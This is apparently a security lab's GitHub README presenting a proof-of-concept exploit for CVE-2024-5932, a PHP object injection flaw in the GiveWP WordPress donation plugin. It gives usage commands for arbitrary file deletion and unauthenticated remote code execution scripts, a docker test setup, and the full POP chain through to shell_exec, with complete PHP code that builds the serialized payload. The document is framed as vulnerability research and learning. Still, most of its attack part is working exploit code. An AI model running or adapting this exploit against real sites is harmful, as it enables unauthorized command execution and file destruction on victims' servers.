This post is a research article published by EQSTLab.
There are currently fake PoC github repositories running xmrig. Check out the link below for more information:
URL1: https://x.com/win3zz/status/1828704644987511107
URL2: https://x.com/bornunique911/status/1828712791844524453
URL3: https://x.com/Chocapikk_/status/1828801346637856841
★ CVE-2024-5932 Arbitrary File deletion and RCE PoC ★
2024-08-27.11.18.39.mp4
Aug 25 : CVE-2024-5932 File Deletion PoC Uploaded
Aug 26 : We have successfully executed arbitrary commands using CVE-2024-5932, but are considering disclosure due to the impact.
Aug 27 : We found a detailed analysis of the PoC in a post by Julien Ahrens of RCE Security and decided to publish our RCE PoC. We uploaded an additional RCE PoC as CVE-2024-5932-rce.py.
CVE-2024-5932 : GiveWP PHP Object Injection vulnerability description: The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.
git clone https://github.com/EQSTLab/CVE-2024-5932.git
cd CVE-2024-5932
pip install -r requirements.txt
# Arbitrary file deletion
python CVE-2024-5932.py -u <URL_TO_EXPLOIT(Donation Form URL)> -f <FILE_TO_DELETE>
# Remote code execution
python CVE-2024-5932-rce.py -u <URL_TO_EXPLOIT(Donation Form URL)> -c <COMMAND_TO_EXECUTE>
python CVE-2024-5932.py -u http://example.com/2024/08/24/donation2/ -f /tmp/test
python CVE-2024-5932-rce.py -u http://example.com/2024/08/24/donation2/ -c "touch /tmp/test"
services:
db:
image: mysql:8.0.27
command: '--default-authentication-plugin=mysql_native_password'
restart: always
environment:
- MYSQL_ROOT_PASSWORD=somewordpress
- MYSQL_DATABASE=wordpress
- MYSQL_USER=wordpress
- MYSQL_PASSWORD=wordpress
expose:
- 3306
- 33060
wordpress:
image: wordpress:6.3.2
ports:
- 80:80
restart: always
environment:
- WORDPRESS_DB_HOST=db
- WORDPRESS_DB_USER=wordpress
- WORDPRESS_DB_PASSWORD=wordpress
- WORDPRESS_DB_NAME=wordpress
volumes:
db_data:
https://downloads.wordpress.org/plugin/give.3.14.1.zip
3. Unzip the GiveWP plugin zip file and copy the entire file to the “/var/www/html/wp-content/plugins” directory.
docker cp give docker-wordpress-1:/var/www/html/wp-content/plugins
First, access the wordpress shell with the following command:
docker exec -it -u root docker-wordpress-1 /bin/bash
If the file is owned by root, it may not be deleted due to permissions. Therefore, you need to change the ownership of the test file with the following command:
touch test && chown www-data test
You can debug your GiveWP using PHPSTORM.
pecl install xdebug
[DEBUG]
zend_extension=/usr/local/lib/php/extensions/no-debug-non-zts-20200930/xdebug.so
xdebug.mode=debug
xdebug.start_with_request=trigger
xdebug.remote_enable=on
xdebug.remote_handler=dbgp
xdebug.client_host={your_PHPSTORM_address}
xdebug.client_port={your_PHPSTORM_debugging_port}
xdebug.idekey=PHPSTORM
xdebug.profiler_enable_trigger=1
xdebug.trace_enable_trigger=1
..And then you can debug your wordpress.
At this point, get_meta() function unserializes the previously saved "give_title" value.
switch ( $key ) {
case 'title':
$user_info[ $key ] = Give()->donor_meta->get_meta( $donor->id, '_give_donor_title_prefix', true );
break;
...
strip_tags: replace nullbytes -> using \0
stripslashes_deep: replace backslashes -> using \\\\
Stripe\StripeObject->__toString()
Stripe\StripeObject->toArray()
Give\PaymentGateways\DataTransferObjects\GiveInsertPaymentData->toArray()
Give\PaymentGateways\DataTransferObjects\GiveInsertPaymentData->getLegacyBillingAddress()
Give->__get('address1')
\Give\Vendors\Faker\ValidGenerator->get('address1')
\Give\Vendors\Faker\ValidGenerator->__call('get', 'address1')
Give\Onboarding\SettingsRepository->get('address1') (Return command string)
call_user_func('shell_exec', 'command')
PoC.php
<?php
namespace Stripe{
class StripeObject
{
protected $_values;
public function __construct(){
$this->_values['foo'] = new \Give\PaymentGateways\DataTransferObjects\GiveInsertPaymentData();
}
}
}
namespace Give\PaymentGateways\DataTransferObjects{
class GiveInsertPaymentData{
public $userInfo;
public function __construct()
{
$this->userInfo['address'] = new \Give();
}
}
}
namespace{
class Give{
protected $container;
public function __construct()
{
$this->container = new \Give\Vendors\Faker\ValidGenerator();
}
}
}
namespace Give\Vendors\Faker{
class ValidGenerator{
protected $validator;
protected $generator;
public function __construct()
{
$this->validator = "shell_exec";
$this->generator = new \Give\Onboarding\SettingsRepository();
}
}
}
namespace Give\Onboarding{
class SettingsRepository{
protected $settings;
public function __construct()
{
$this -> settings['address1'] = 'touch /tmp/EQSTtest';
}
}
}
namespace{
$a = new Stripe\StripeObject();
echo serialize($a);
}
POP Chain allows remote command execution.
Using TCPDF, you can exploit the arbitrary file deletion.
This repository is not intended to be Object injection exploit to CVE-2024-5932. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.
We publish CVE and malware analysis once a month. If you're interested, please follow the links below to check out our publications. https://www.skshieldus.com/eng/business/insight.do